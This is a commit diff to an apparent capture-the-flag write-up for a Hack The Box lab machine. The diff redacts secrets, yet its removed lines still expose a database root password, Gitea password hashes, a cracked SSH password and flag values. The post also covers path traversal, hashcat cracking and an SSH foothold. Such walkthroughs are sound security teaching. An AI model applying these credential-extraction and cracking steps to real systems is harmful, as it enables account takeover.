QRouland/DevBlog
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fix typos

Browse Source
This commit is contained in:
Quentin Rouland 2025-03-24 18:18:17 +01:00
parent 12e2ca11c0
commit 41d64619f3
1 changed files with 7 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
posts/2025-03-24-htb-1-titanic.md
View File

@ -126,7 +126,7 @@ On `dev.titanic.htb`, we find a Gitea instance running version 1.22.1. Two publi
- `http://dev.titanic.htb/developer/flask-app` (contains code for the Flask app) - `http://dev.titanic.htb/developer/flask-app` (contains code for the Flask app)
- `http://dev.titanic.htb/developer/docker-config` (contains Docker compose for the app) - `http://dev.titanic.htb/developer/docker-config` (contains Docker compose for the app)
In the Docker configuration, we found a MySQL configuration with the root password ```MySQLP@$$w0rd!```. However, it didn't seem like the MySQL server was running, so we kept this information but it appeared to be unusable at the moment. In the Docker configuration, we found a MySQL configuration with the root password ```<SNIP>```. However, it didn't seem like the MySQL server was running, so we kept this information but it appeared to be unusable at the moment.
Additionally, we discovered that Gitea data is located at ```/home/developer/gitea/data/gitea``` in the Docker Compose files. We can use path traversal to access this data. Additionally, we discovered that Gitea data is located at ```/home/developer/gitea/data/gitea``` in the Docker Compose files. We can use path traversal to access this data.
@ -150,19 +150,19 @@ $ cd giteatohashcat/
$ python giteaToHashcat.py ../../gitea.db $ python giteaToHashcat.py ../../gitea.db
[+] Extracting password hashes... [+] Extracting password hashes...
[+] Extraction complete. Output: [+] Extraction complete. Output:
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY= administrator:sha256:50000:<SNIP>
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y= developer:sha256:50000:<SNIP>
... ...
``` ```
We focused on the `developer` user, as we identified that there is an SSH user with the same username and a shell. We hoped it used the same password, so we attempted to crack the password `hash` using hashcat. We focused on the `developer` user, as we identified that there is an SSH user with the same username and a shell. We hoped it used the same password, so we attempted to crack the password `hash` using hashcat.
```bash ```bash
hashcat -m 10900 sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y= /usr/share/wordlists/rockyou.txt.gz hashcat -m 10900 sha256:50000:<SNIP> /usr/share/wordlists/rockyou.txt.gz
.... ....
``` ```
After successfully cracking the hash, we get the password `25282528`. After successfully cracking the hash, we get the password `<SNIP>`.
#### Getting SSH Access #### Getting SSH Access
@ -173,7 +173,7 @@ $ ssh developer@titanic.htb
$ whoami $ whoami
developer developer
$ cat user.txt $ cat user.txt
979fbe270d355153aa5ee87ce670b273 <SNIP>
``` ```
Now we have foothold on the machine and our first user flag. Now we have foothold on the machine and our first user flag.
@ -225,7 +225,7 @@ $ whoami
root root
$ cd $ cd
$ cat root.txt $ cat root.txt
867da4d778e3cb6d310e60f2ae7366c1 <SNIP>
``` ```
We have gained root access and obtained the root flag! We have gained root access and obtained the root flag!